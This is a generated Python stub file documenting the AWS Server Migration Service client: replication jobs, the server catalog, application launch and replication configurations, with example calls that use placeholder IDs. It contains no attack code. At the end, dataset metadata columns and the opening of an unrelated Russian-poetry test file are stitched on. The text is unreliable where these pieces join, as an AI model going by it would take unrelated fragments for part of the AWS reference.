- **stage** *(string) --*
String describing the current stage of a replication run.
- **stageProgress** *(string) --*
String describing the progress of the current stage of a replication run.
- **statusMessage** *(string) --*
The description of the current status of the replication job.
- **amiId** *(string) --*
The identifier of the Amazon Machine Image (AMI) from the replication run.
- **scheduledStartTime** *(datetime) --*
The start time of the next replication run.
- **completedTime** *(datetime) --*
The completion time of the last replication run.
- **description** *(string) --*
The description of the replication run.
- **encrypted** *(boolean) --*
Whether the replication run should produce encrypted AMIs. See also ``KmsKeyId`` below.
- **kmsKeyId** *(string) --*
KMS key ID for replication jobs that produce encrypted AMIs. Can be any of the following:
* KMS key ID
* KMS key alias
* ARN referring to KMS key ID
* ARN referring to KMS key alias
If encrypted is *true* but a KMS key id is not specified, the customer's default KMS key for EBS is used.
- **replicationRunList** *(list) --*
Information about the replication runs.
- *(dict) --*
Represents a replication run.
- **replicationRunId** *(string) --*
The identifier of the replication run.
- **state** *(string) --*
The state of the replication run.
- **type** *(string) --*
The type of replication run.
- **stageDetails** *(dict) --*
Details of the current stage of the replication run.
- **stage** *(string) --*
String describing the current stage of a replication run.
- **stageProgress** *(string) --*
String describing the progress of the current stage of a replication run.
- **statusMessage** *(string) --*
The description of the current status of the replication job.
- **amiId** *(string) --*
The identifier of the Amazon Machine Image (AMI) from the replication run.
- **scheduledStartTime** *(datetime) --*
The start time of the next replication run.
- **completedTime** *(datetime) --*
The completion time of the last replication run.
- **description** *(string) --*
The description of the replication run.
- **encrypted** *(boolean) --*
Whether the replication run should produce encrypted AMIs. See also ``KmsKeyId`` below.
- **kmsKeyId** *(string) --*
KMS key ID for replication jobs that produce encrypted AMIs. Can be any of the following:
* KMS key ID
* KMS key alias
* ARN referring to KMS key ID
* ARN referring to KMS key alias
If encrypted is *true* but a KMS key id is not specified, the customer's default KMS key for EBS is used.
- **nextToken** *(string) --*
The token required to retrieve the next set of results. This value is null when there are no more results to return.
:type replicationJobId: string
:param replicationJobId: **[REQUIRED]**
The identifier of the replication job.
:type nextToken: string
:param nextToken:
The token for the next set of results.
:type maxResults: integer
:param maxResults:
The maximum number of results to return in a single call. The default value is 50. To retrieve the remaining results, make another call with the returned ``NextToken`` value.
:rtype: dict
:returns:
"""
pass
def get_servers(self, nextToken: str = None, maxResults: int = None, vmServerAddressList: List = None) -> Dict:
"""
Describes the servers in your server catalog.
Before you can describe your servers, you must import them using ImportServerCatalog.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/GetServers>`_
**Request Syntax**
::
response = client.get_servers(
nextToken='string',
maxResults=123,
vmServerAddressList=[
{
'vmManagerId': 'string',
'vmId': 'string'
},
]
)
**Response Syntax**
::
{
'lastModifiedOn': datetime(2015, 1, 1),
'serverCatalogStatus': 'NOT_IMPORTED'|'IMPORTING'|'AVAILABLE'|'DELETED'|'EXPIRED',
'serverList': [
{
'serverId': 'string',
'serverType': 'VIRTUAL_MACHINE',
'vmServer': {
'vmServerAddress': {
'vmManagerId': 'string',
'vmId': 'string'
},
'vmName': 'string',
'vmManagerName': 'string',
'vmManagerType': 'VSPHERE'|'SCVMM'|'HYPERV-MANAGER',
'vmPath': 'string'
},
'replicationJobId': 'string',
'replicationJobTerminated': True|False
},
],
'nextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **lastModifiedOn** *(datetime) --*
The time when the server was last modified.
- **serverCatalogStatus** *(string) --*
The status of the server catalog.
- **serverList** *(list) --*
Information about the servers.
- *(dict) --*
Represents a server.
- **serverId** *(string) --*
The identifier of the server.
- **serverType** *(string) --*
The type of server.
- **vmServer** *(dict) --*
Information about the VM server.
- **vmServerAddress** *(dict) --*
Information about the VM server location.
- **vmManagerId** *(string) --*
The identifier of the VM manager.
- **vmId** *(string) --*
The identifier of the VM.
- **vmName** *(string) --*
The name of the VM.
- **vmManagerName** *(string) --*
The name of the VM manager.
- **vmManagerType** *(string) --*
The type of VM management product.
- **vmPath** *(string) --*
The VM folder path in the vCenter Server virtual machine inventory tree.
- **replicationJobId** *(string) --*
The identifier of the replication job.
- **replicationJobTerminated** *(boolean) --*
Indicates whether the replication job is deleted or failed.
- **nextToken** *(string) --*
The token required to retrieve the next set of results. This value is null when there are no more results to return.
:type nextToken: string
:param nextToken:
The token for the next set of results.
:type maxResults: integer
:param maxResults:
The maximum number of results to return in a single call. The default value is 50. To retrieve the remaining results, make another call with the returned ``NextToken`` value.
:type vmServerAddressList: list
:param vmServerAddressList:
List of ``VmServerAddress`` objects.
- *(dict) --*
Represents a VM server location.
- **vmManagerId** *(string) --*
The identifier of the VM manager.
- **vmId** *(string) --*
The identifier of the VM.
:rtype: dict
:returns:
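**Example**
A sketch that filters the catalog by VM address; the VM manager and VM identifiers are placeholders::
response = client.get_servers(
    vmServerAddressList=[
        {'vmManagerId': 'vmm-EXAMPLE', 'vmId': 'vm-EXAMPLE'}
    ]
)
print(response['serverCatalogStatus'], len(response['serverList']))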
"""
pass
def get_waiter(self, waiter_name: str = None) -> Waiter:
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters
section of the service docs for a list of available waiters.
:returns: The specified waiter object.
:rtype: botocore.waiter.Waiter
"""
pass
def import_server_catalog(self) -> Dict:
"""
Gathers a complete list of on-premises servers. Connectors must be installed and monitoring all servers that you want to import.
This call returns immediately, but might take additional time to retrieve all the servers.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/ImportServerCatalog>`_
**Request Syntax**
::
response = client.import_server_catalog()
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:rtype: dict
:returns:
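**Example**
A sketch that starts a catalog import and polls ``get_servers`` until the import finishes; the polling interval is arbitrary::
import time
client.import_server_catalog()
while client.get_servers(maxResults=1)['serverCatalogStatus'] == 'IMPORTING':
    time.sleep(30)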
"""
pass
def launch_app(self, appId: str = None) -> Dict:
"""
Launches an application stack.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/LaunchApp>`_
**Request Syntax**
::
response = client.launch_app(
appId='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type appId: string
:param appId:
ID of the application to launch.
:rtype: dict
:returns:
"""
pass
def list_apps(self, appIds: List = None, nextToken: str = None, maxResults: int = None) -> Dict:
"""
Returns a list of summaries for all applications.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/ListApps>`_
**Request Syntax**
::
response = client.list_apps(
appIds=[
'string',
],
nextToken='string',
maxResults=123
)
**Response Syntax**
::
{
'apps': [
{
'appId': 'string',
'name': 'string',
'description': 'string',
'status': 'CREATING'|'ACTIVE'|'UPDATING'|'DELETING'|'DELETED'|'DELETE_FAILED',
'statusMessage': 'string',
'replicationStatus': 'READY_FOR_CONFIGURATION'|'CONFIGURATION_IN_PROGRESS'|'CONFIGURATION_INVALID'|'READY_FOR_REPLICATION'|'VALIDATION_IN_PROGRESS'|'REPLICATION_PENDING'|'REPLICATION_IN_PROGRESS'|'REPLICATED'|'DELTA_REPLICATION_IN_PROGRESS'|'DELTA_REPLICATED'|'DELTA_REPLICATION_FAILED'|'REPLICATION_FAILED'|'REPLICATION_STOPPING'|'REPLICATION_STOP_FAILED'|'REPLICATION_STOPPED',
'replicationStatusMessage': 'string',
'latestReplicationTime': datetime(2015, 1, 1),
'launchStatus': 'READY_FOR_CONFIGURATION'|'CONFIGURATION_IN_PROGRESS'|'CONFIGURATION_INVALID'|'READY_FOR_LAUNCH'|'VALIDATION_IN_PROGRESS'|'LAUNCH_PENDING'|'LAUNCH_IN_PROGRESS'|'LAUNCHED'|'DELTA_LAUNCH_IN_PROGRESS'|'DELTA_LAUNCH_FAILED'|'LAUNCH_FAILED'|'TERMINATE_IN_PROGRESS'|'TERMINATE_FAILED'|'TERMINATED',
'launchStatusMessage': 'string',
'launchDetails': {
'latestLaunchTime': datetime(2015, 1, 1),
'stackName': 'string',
'stackId': 'string'
},
'creationTime': datetime(2015, 1, 1),
'lastModified': datetime(2015, 1, 1),
'roleName': 'string',
'totalServerGroups': 123,
'totalServers': 123
},
],
'nextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **apps** *(list) --*
A list of application summaries.
- *(dict) --*
Information about the application.
- **appId** *(string) --*
Unique ID of the application.
- **name** *(string) --*
Name of the application.
- **description** *(string) --*
Description of the application.
- **status** *(string) --*
Status of the application.
- **statusMessage** *(string) --*
A message related to the status of the application.
- **replicationStatus** *(string) --*
Replication status of the application.
- **replicationStatusMessage** *(string) --*
A message related to the replication status of the application.
- **latestReplicationTime** *(datetime) --*
Timestamp of the application's most recent successful replication.
- **launchStatus** *(string) --*
Launch status of the application.
- **launchStatusMessage** *(string) --*
A message related to the launch status of the application.
- **launchDetails** *(dict) --*
Details about the latest launch of the application.
- **latestLaunchTime** *(datetime) --*
Latest time this application was launched successfully.
- **stackName** *(string) --*
Name of the latest stack launched for this application.
- **stackId** *(string) --*
Identifier of the latest stack launched for this application.
- **creationTime** *(datetime) --*
Time of creation of this application.
- **lastModified** *(datetime) --*
Timestamp of the application's most recent modification.
- **roleName** *(string) --*
Name of the service role in the customer's account used by AWS SMS.
- **totalServerGroups** *(integer) --*
Number of server groups present in the application.
- **totalServers** *(integer) --*
Number of servers present in the application.
- **nextToken** *(string) --*
The token required to retrieve the next set of results. This value is null when there are no more results to return.
:type appIds: list
:param appIds:
- *(string) --*
:type nextToken: string
:param nextToken:
The token for the next set of results.
:type maxResults: integer
:param maxResults:
The maximum number of results to return in a single call. The default value is 50. To retrieve the remaining results, make another call with the returned ``NextToken`` value.
:rtype: dict
:returns:
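**Example**
A sketch of manual pagination over application summaries::
apps = []
kwargs = {'maxResults': 50}
while True:
    page = client.list_apps(**kwargs)
    apps.extend(page.get('apps', []))
    if not page.get('nextToken'):
        break
    kwargs['nextToken'] = page['nextToken']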
"""
pass
def put_app_launch_configuration(self, appId: str = None, roleName: str = None, serverGroupLaunchConfigurations: List = None) -> Dict:
"""
Creates a launch configuration for an application.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/PutAppLaunchConfiguration>`_
**Request Syntax**
::
response = client.put_app_launch_configuration(
appId='string',
roleName='string',
serverGroupLaunchConfigurations=[
{
'serverGroupId': 'string',
'launchOrder': 123,
'serverLaunchConfigurations': [
{
'server': {
'serverId': 'string',
'serverType': 'VIRTUAL_MACHINE',
'vmServer': {
'vmServerAddress': {
'vmManagerId': 'string',
'vmId': 'string'
},
'vmName': 'string',
'vmManagerName': 'string',
'vmManagerType': 'VSPHERE'|'SCVMM'|'HYPERV-MANAGER',
'vmPath': 'string'
},
'replicationJobId': 'string',
'replicationJobTerminated': True|False
},
'logicalId': 'string',
'vpc': 'string',
'subnet': 'string',
'securityGroup': 'string',
'ec2KeyName': 'string',
'userData': {
's3Location': {
'bucket': 'string',
'key': 'string'
}
},
'instanceType': 'string',
'associatePublicIpAddress': True|False
},
]
},
]
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type appId: string
:param appId:
ID of the application associated with the launch configuration.
:type roleName: string
:param roleName:
Name of the service role in the customer\'s account that Amazon CloudFormation uses to launch the application.
:type serverGroupLaunchConfigurations: list
:param serverGroupLaunchConfigurations:
Launch configurations for server groups in the application.
- *(dict) --*
Launch configuration for a server group.
- **serverGroupId** *(string) --*
Identifier of the server group the launch configuration is associated with.
- **launchOrder** *(integer) --*
Launch order of servers in the server group.
- **serverLaunchConfigurations** *(list) --*
Launch configuration for servers in the server group.
- *(dict) --*
Launch configuration for a server.
- **server** *(dict) --*
Identifier of the server the launch configuration is associated with.
- **serverId** *(string) --*
The identifier of the server.
- **serverType** *(string) --*
The type of server.
- **vmServer** *(dict) --*
Information about the VM server.
- **vmServerAddress** *(dict) --*
Information about the VM server location.
- **vmManagerId** *(string) --*
The identifier of the VM manager.
- **vmId** *(string) --*
The identifier of the VM.
- **vmName** *(string) --*
The name of the VM.
- **vmManagerName** *(string) --*
The name of the VM manager.
- **vmManagerType** *(string) --*
The type of VM management product.
- **vmPath** *(string) --*
The VM folder path in the vCenter Server virtual machine inventory tree.
- **replicationJobId** *(string) --*
The identifier of the replication job.
- **replicationJobTerminated** *(boolean) --*
Indicates whether the replication job is deleted or failed.
- **logicalId** *(string) --*
Logical ID of the server in the Amazon CloudFormation template.
- **vpc** *(string) --*
Identifier of the VPC the server should be launched into.
- **subnet** *(string) --*
Identifier of the subnet the server should be launched into.
- **securityGroup** *(string) --*
Identifier of the security group that applies to the launched server.
- **ec2KeyName** *(string) --*
Name of the EC2 SSH Key to be used for connecting to the launched server.
- **userData** *(dict) --*
Location of the user-data script to be executed when launching the server.
- **s3Location** *(dict) --*
Amazon S3 location of the user-data script.
- **bucket** *(string) --*
Amazon S3 bucket name.
- **key** *(string) --*
Amazon S3 bucket key.
- **instanceType** *(string) --*
Instance type to be used for launching the server.
- **associatePublicIpAddress** *(boolean) --*
If true, a publicly accessible IP address is created when launching the server.
:rtype: dict
:returns:
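**Example**
A minimal sketch for a single server group. All identifiers, the VPC/subnet/security group values, and the partial ``server`` structure are illustrative assumptions, not values from this reference::
client.put_app_launch_configuration(
    appId='app-EXAMPLE',
    roleName='sms-launch-role-EXAMPLE',
    serverGroupLaunchConfigurations=[
        {
            'serverGroupId': 'server-group-EXAMPLE',
            'launchOrder': 1,
            'serverLaunchConfigurations': [
                {
                    'server': {'serverId': 's-EXAMPLE'},
                    'logicalId': 'WebServer1',
                    'vpc': 'vpc-EXAMPLE',
                    'subnet': 'subnet-EXAMPLE',
                    'securityGroup': 'sg-EXAMPLE',
                    'instanceType': 'm5.large'
                }
            ]
        }
    ]
)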
"""
pass
def put_app_replication_configuration(self, appId: str = None, serverGroupReplicationConfigurations: List = None) -> Dict:
"""
Creates or updates a replication configuration for an application.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/PutAppReplicationConfiguration>`_
**Request Syntax**
::
response = client.put_app_replication_configuration(
appId='string',
serverGroupReplicationConfigurations=[
{
'serverGroupId': 'string',
'serverReplicationConfigurations': [
{
'server': {
'serverId': 'string',
'serverType': 'VIRTUAL_MACHINE',
'vmServer': {
'vmServerAddress': {
'vmManagerId': 'string',
'vmId': 'string'
},
'vmName': 'string',
'vmManagerName': 'string',
'vmManagerType': 'VSPHERE'|'SCVMM'|'HYPERV-MANAGER',
'vmPath': 'string'
},
'replicationJobId': 'string',
'replicationJobTerminated': True|False
},
'serverReplicationParameters': {
'seedTime': datetime(2015, 1, 1),
'frequency': 123,
'runOnce': True|False,
'licenseType': 'AWS'|'BYOL',
'numberOfRecentAmisToKeep': 123,
'encrypted': True|False,
'kmsKeyId': 'string'
}
},
]
},
]
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type appId: string
:param appId:
ID of the application associated with the replication configuration.
:type serverGroupReplicationConfigurations: list
:param serverGroupReplicationConfigurations:
Replication configurations for server groups in the application.
- *(dict) --*
Replication configuration for a server group.
- **serverGroupId** *(string) --*
Identifier of the server group this replication configuration is associated with.
- **serverReplicationConfigurations** *(list) --*
Replication configuration for servers in the server group.
- *(dict) --*
Replication configuration of a server.
- **server** *(dict) --*
Identifier of the server this replication configuration is associated with.
- **serverId** *(string) --*
The identifier of the server.
- **serverType** *(string) --*
The type of server.
- **vmServer** *(dict) --*
Information about the VM server.
- **vmServerAddress** *(dict) --*
Information about the VM server location.
- **vmManagerId** *(string) --*
The identifier of the VM manager.
- **vmId** *(string) --*
The identifier of the VM.
- **vmName** *(string) --*
The name of the VM.
- **vmManagerName** *(string) --*
The name of the VM manager.
- **vmManagerType** *(string) --*
The type of VM management product.
- **vmPath** *(string) --*
The VM folder path in the vCenter Server virtual machine inventory tree.
- **replicationJobId** *(string) --*
The identifier of the replication job.
- **replicationJobTerminated** *(boolean) --*
Indicates whether the replication job is deleted or failed.
- **serverReplicationParameters** *(dict) --*
Parameters for replicating the server.
- **seedTime** *(datetime) --*
Seed time for creating a replication job for the server.
- **frequency** *(integer) --*
Frequency of creating replication jobs for the server.
- **runOnce** *(boolean) --*
- **licenseType** *(string) --*
License type for creating a replication job for the server.
- **numberOfRecentAmisToKeep** *(integer) --*
Number of recent AMIs to keep when creating a replication job for this server.
- **encrypted** *(boolean) --*
When true, the replication job produces encrypted AMIs. See also ``KmsKeyId`` below.
- **kmsKeyId** *(string) --*
KMS key ID for replication jobs that produce encrypted AMIs. Can be any of the following:
* KMS key ID
* KMS key alias
* ARN referring to KMS key ID
* ARN referring to KMS key alias
If encrypted is *true* but a KMS key id is not specified, the customer\'s default KMS key for EBS is used.
:rtype: dict
:returns:
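**Example**
A minimal sketch; the identifiers and the partial ``server`` structure are illustrative assumptions::
client.put_app_replication_configuration(
    appId='app-EXAMPLE',
    serverGroupReplicationConfigurations=[
        {
            'serverGroupId': 'server-group-EXAMPLE',
            'serverReplicationConfigurations': [
                {
                    'server': {'serverId': 's-EXAMPLE'},
                    'serverReplicationParameters': {
                        'frequency': 12,
                        'runOnce': False,
                        'licenseType': 'BYOL',
                        'numberOfRecentAmisToKeep': 3,
                        'encrypted': False
                    }
                }
            ]
        }
    ]
)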
"""
pass
def start_app_replication(self, appId: str = None) -> Dict:
"""
Starts replicating an application.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/StartAppReplication>`_
**Request Syntax**
::
response = client.start_app_replication(
appId='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type appId: string
:param appId:
ID of the application to replicate.
:rtype: dict
:returns:
"""
pass
def start_on_demand_replication_run(self, replicationJobId: str, description: str = None) -> Dict:
"""
Starts an on-demand replication run for the specified replication job. This replication run starts immediately and is in addition to the ones already scheduled.
There is a limit on the number of on-demand replication runs you can request in a 24-hour period.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/StartOnDemandReplicationRun>`_
**Request Syntax**
::
response = client.start_on_demand_replication_run(
replicationJobId='string',
description='string'
)
**Response Syntax**
::
{
'replicationRunId': 'string'
}
**Response Structure**
- *(dict) --*
- **replicationRunId** *(string) --*
The identifier of the replication run.
:type replicationJobId: string
:param replicationJobId: **[REQUIRED]**
The identifier of the replication job.
:type description: string
:param description:
The description of the replication run.
:rtype: dict
:returns:
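**Example**
A usage sketch; the job identifier and description are placeholders::
run = client.start_on_demand_replication_run(
    replicationJobId='sms-job-EXAMPLE',
    description='Pre-cutover run'
)
print(run['replicationRunId'])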
"""
pass
def stop_app_replication(self, appId: str = None) -> Dict:
"""
Stops replicating an application.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/StopAppReplication>`_
**Request Syntax**
::
response = client.stop_app_replication(
appId='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type appId: string
:param appId:
ID of the application to stop replicating.
:rtype: dict
:returns:
"""
pass
def terminate_app(self, appId: str = None) -> Dict:
"""
Terminates the stack for an application.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/TerminateApp>`_
**Request Syntax**
::
response = client.terminate_app(
appId='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type appId: string
:param appId:
ID of the application to terminate.
:rtype: dict
:returns:
"""
pass
def update_app(self, appId: str = None, name: str = None, description: str = None, roleName: str = None, serverGroups: List = None, tags: List = None) -> Dict:
"""
Updates an application.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/UpdateApp>`_
**Request Syntax**
::
response = client.update_app(
appId='string',
name='string',
description='string',
roleName='string',
serverGroups=[
{
'serverGroupId': 'string',
'name': 'string',
'serverList': [
{
'serverId': 'string',
'serverType': 'VIRTUAL_MACHINE',
'vmServer': {
'vmServerAddress': {
'vmManagerId': 'string',
'vmId': 'string'
},
'vmName': 'string',
'vmManagerName': 'string',
'vmManagerType': 'VSPHERE'|'SCVMM'|'HYPERV-MANAGER',
'vmPath': 'string'
},
'replicationJobId': 'string',
'replicationJobTerminated': True|False
},
]
},
],
tags=[
{
'key': 'string',
'value': 'string'
},
]
)
**Response Syntax**
::
{
'appSummary': {
'appId': 'string',
'name': 'string',
'description': 'string',
'status': 'CREATING'|'ACTIVE'|'UPDATING'|'DELETING'|'DELETED'|'DELETE_FAILED',
'statusMessage': 'string',
'replicationStatus': 'READY_FOR_CONFIGURATION'|'CONFIGURATION_IN_PROGRESS'|'CONFIGURATION_INVALID'|'READY_FOR_REPLICATION'|'VALIDATION_IN_PROGRESS'|'REPLICATION_PENDING'|'REPLICATION_IN_PROGRESS'|'REPLICATED'|'DELTA_REPLICATION_IN_PROGRESS'|'DELTA_REPLICATED'|'DELTA_REPLICATION_FAILED'|'REPLICATION_FAILED'|'REPLICATION_STOPPING'|'REPLICATION_STOP_FAILED'|'REPLICATION_STOPPED',
'replicationStatusMessage': 'string',
'latestReplicationTime': datetime(2015, 1, 1),
'launchStatus': 'READY_FOR_CONFIGURATION'|'CONFIGURATION_IN_PROGRESS'|'CONFIGURATION_INVALID'|'READY_FOR_LAUNCH'|'VALIDATION_IN_PROGRESS'|'LAUNCH_PENDING'|'LAUNCH_IN_PROGRESS'|'LAUNCHED'|'DELTA_LAUNCH_IN_PROGRESS'|'DELTA_LAUNCH_FAILED'|'LAUNCH_FAILED'|'TERMINATE_IN_PROGRESS'|'TERMINATE_FAILED'|'TERMINATED',
'launchStatusMessage': 'string',
'launchDetails': {
'latestLaunchTime': datetime(2015, 1, 1),
'stackName': 'string',
'stackId': 'string'
},
'creationTime': datetime(2015, 1, 1),
'lastModified': datetime(2015, 1, 1),
'roleName': 'string',
'totalServerGroups': 123,
'totalServers': 123
},
'serverGroups': [
{
'serverGroupId': 'string',
'name': 'string',
'serverList': [
{
'serverId': 'string',
'serverType': 'VIRTUAL_MACHINE',
'vmServer': {
'vmServerAddress': {
'vmManagerId': 'string',
'vmId': 'string'
},
'vmName': 'string',
'vmManagerName': 'string',
'vmManagerType': 'VSPHERE'|'SCVMM'|'HYPERV-MANAGER',
'vmPath': 'string'
},
'replicationJobId': 'string',
'replicationJobTerminated': True|False
},
]
},
],
'tags': [
{
'key': 'string',
'value': 'string'
},
]
}
**Response Structure**
- *(dict) --*
- **appSummary** *(dict) --*
Summary description of the application.
- **appId** *(string) --*
Unique ID of the application.
- **name** *(string) --*
Name of the application.
- **description** *(string) --*
Description of the application.
- **status** *(string) --*
Status of the application.
- **statusMessage** *(string) --*
A message related to the status of the application.
- **replicationStatus** *(string) --*
Replication status of the application.
- **replicationStatusMessage** *(string) --*
A message related to the replication status of the application.
- **latestReplicationTime** *(datetime) --*
Timestamp of the application's most recent successful replication.
- **launchStatus** *(string) --*
Launch status of the application.
- **launchStatusMessage** *(string) --*
A message related to the launch status of the application.
- **launchDetails** *(dict) --*
Details about the latest launch of the application.
- **latestLaunchTime** *(datetime) --*
Latest time this application was launched successfully.
- **stackName** *(string) --*
Name of the latest stack launched for this application.
- **stackId** *(string) --*
Identifier of the latest stack launched for this application.
- **creationTime** *(datetime) --*
Time of creation of this application.
- **lastModified** *(datetime) --*
Timestamp of the application's most recent modification.
- **roleName** *(string) --*
Name of the service role in the customer's account used by AWS SMS.
- **totalServerGroups** *(integer) --*
Number of server groups present in the application.
- **totalServers** *(integer) --*
Number of servers present in the application.
- **serverGroups** *(list) --*
List of updated server groups in the application.
- *(dict) --*
A logical grouping of servers.
- **serverGroupId** *(string) --*
Identifier of a server group.
- **name** *(string) --*
Name of a server group.
- **serverList** *(list) --*
List of servers belonging to a server group.
- *(dict) --*
Represents a server.
- **serverId** *(string) --*
The identifier of the server.
- **serverType** *(string) --*
The type of server.
- **vmServer** *(dict) --*
Information about the VM server.
- **vmServerAddress** *(dict) --*
Information about the VM server location.
- **vmManagerId** *(string) --*
The identifier of the VM manager.
- **vmId** *(string) --*
The identifier of the VM.
- **vmName** *(string) --*
The name of the VM.
- **vmManagerName** *(string) --*
The name of the VM manager.
- **vmManagerType** *(string) --*
The type of VM management product.
- **vmPath** *(string) --*
The VM folder path in the vCenter Server virtual machine inventory tree.
- **replicationJobId** *(string) --*
The identifier of the replication job.
- **replicationJobTerminated** *(boolean) --*
Indicates whether the replication job is deleted or failed.
- **tags** *(list) --*
List of tags associated with the application.
- *(dict) --*
A label that can be assigned to an application.
- **key** *(string) --*
Tag key.
- **value** *(string) --*
Tag value.
:type appId: string
:param appId:
ID of the application to update.
:type name: string
:param name:
New name of the application.
:type description: string
:param description:
New description of the application.
:type roleName: string
:param roleName:
Name of the service role in the customer\'s account used by AWS SMS.
:type serverGroups: list
:param serverGroups:
List of server groups in the application to update.
- *(dict) --*
A logical grouping of servers.
- **serverGroupId** *(string) --*
Identifier of a server group.
- **name** *(string) --*
Name of a server group.
- **serverList** *(list) --*
List of servers belonging to a server group.
- *(dict) --*
Represents a server.
- **serverId** *(string) --*
The identifier of the server.
- **serverType** *(string) --*
The type of server.
- **vmServer** *(dict) --*
Information about the VM server.
- **vmServerAddress** *(dict) --*
Information about the VM server location.
- **vmManagerId** *(string) --*
The identifier of the VM manager.
- **vmId** *(string) --*
The identifier of the VM.
- **vmName** *(string) --*
The name of the VM.
- **vmManagerName** *(string) --*
The name of the VM manager.
- **vmManagerType** *(string) --*
The type of VM management product.
- **vmPath** *(string) --*
The VM folder path in the vCenter Server virtual machine inventory tree.
- **replicationJobId** *(string) --*
The identifier of the replication job.
- **replicationJobTerminated** *(boolean) --*
Indicates whether the replication job is deleted or failed.
:type tags: list
:param tags:
List of tags to associate with the application.
- *(dict) --*
A label that can be assigned to an application.
- **key** *(string) --*
Tag key.
- **value** *(string) --*
Tag value.
:rtype: dict
:returns:
"""
pass
def update_replication_job(self, replicationJobId: str, frequency: int = None, nextReplicationRunStartTime: datetime = None, licenseType: str = None, roleName: str = None, description: str = None, numberOfRecentAmisToKeep: int = None, encrypted: bool = None, kmsKeyId: str = None) -> Dict:
"""
Updates the specified settings for the specified replication job.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/UpdateReplicationJob>`_
**Request Syntax**
::
response = client.update_replication_job(
replicationJobId='string',
frequency=123,
nextReplicationRunStartTime=datetime(2015, 1, 1),
licenseType='AWS'|'BYOL',
roleName='string',
description='string',
numberOfRecentAmisToKeep=123,
encrypted=True|False,
kmsKeyId='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type replicationJobId: string
:param replicationJobId: **[REQUIRED]**
The identifier of the replication job.
:type frequency: integer
:param frequency:
The time between consecutive replication runs, in hours.
:type nextReplicationRunStartTime: datetime
:param nextReplicationRunStartTime:
The start time of the next replication run.
:type licenseType: string
:param licenseType:
The license type to be used for the AMI created by a successful replication run.
:type roleName: string
:param roleName:
The name of the IAM role to be used by AWS SMS.
:type description: string
:param description:
The description of the replication job.
:type numberOfRecentAmisToKeep: integer
:param numberOfRecentAmisToKeep:
The maximum number of SMS-created AMIs to retain. The oldest will be deleted once the maximum number is reached and a new AMI is created.
:type encrypted: boolean
:param encrypted:
When *true*, the replication job produces encrypted AMIs. See also ``kmsKeyId`` below.
:type kmsKeyId: string
:param kmsKeyId:
KMS key ID for replication jobs that produce encrypted AMIs. Can be any of the following:
* KMS key ID
* KMS key alias
* ARN referring to KMS key ID
* ARN referring to KMS key alias
If ``encrypted`` is *true* but a KMS key ID is not specified, the customer\'s default KMS key for EBS is used.
:rtype: dict
:returns:
"""
pass
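# --- Added usage sketch (illustrative only; not part of the generated stub above) ---
# The update_replication_job docstring notes that kmsKeyId may be a KMS key ID,
# key alias, or either ARN form, and that the account's default EBS KMS key is
# used when encrypted is true and no key is given. The helper below shows one
# plausible call through a real boto3 client; the job identifier
# 'sms-job-example' is an assumed placeholder.
def _example_update_replication_job_call():
    import boto3  # assumes boto3 is available; the stubs above only mirror its API
    client = boto3.client('sms')
    return client.update_replication_job(
        replicationJobId='sms-job-example',  # placeholder identifier
        frequency=24,                        # replicate once per day
        encrypted=True,                      # no kmsKeyId: default EBS KMS key is used
        numberOfRecentAmisToKeep=5,
    )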
| 46.799918 | 403 | 0.468899 | 9,024 | 113,677 | 5.86691 | 0.057735 | 0.024932 | 0.024083 | 0.022439 | 0.859132 | 0.837958 | 0.820354 | 0.807038 | 0.795044 | 0.785203 | 0 | 0.008418 | 0.431512 | 113,677 | 2,428 | 404 | 46.819193 | 0.810829 | 0.799229 | 0 | 0.438356 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.438356 | false | 0.438356 | 0.123288 | 0 | 0.575342 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
afe83ae51facb95287c36d5db5fa532c2c0f177d | 11,828 | py | Python | poetrytools/tests/test_ru_poetics.py | standfromunder/Poetry-Tools | fa81b677be41b542e2288f39a1d3cc5d2b761922 | [
"MIT"
] | 1 | 2020-12-01T22:51:03.000Z | 2020-12-01T22:51:03.000Z | poetrytools/tests/test_ru_poetics.py | standfromunder/Poetry-Tools | fa81b677be41b542e2288f39a1d3cc5d2b761922 | [
"MIT"
] | null | null | null | poetrytools/tests/test_ru_poetics.py | standfromunder/Poetry-Tools | fa81b677be41b542e2288f39a1d3cc5d2b761922 | [
"MIT"
] | 1 | 2021-03-04T17:36:32.000Z | 2021-03-04T17:36:32.000Z | import os
import unittest
from poetrytools.PoetryRU import PoetryRU
class TestENPoems(unittest.TestCase):
def setUp(self):
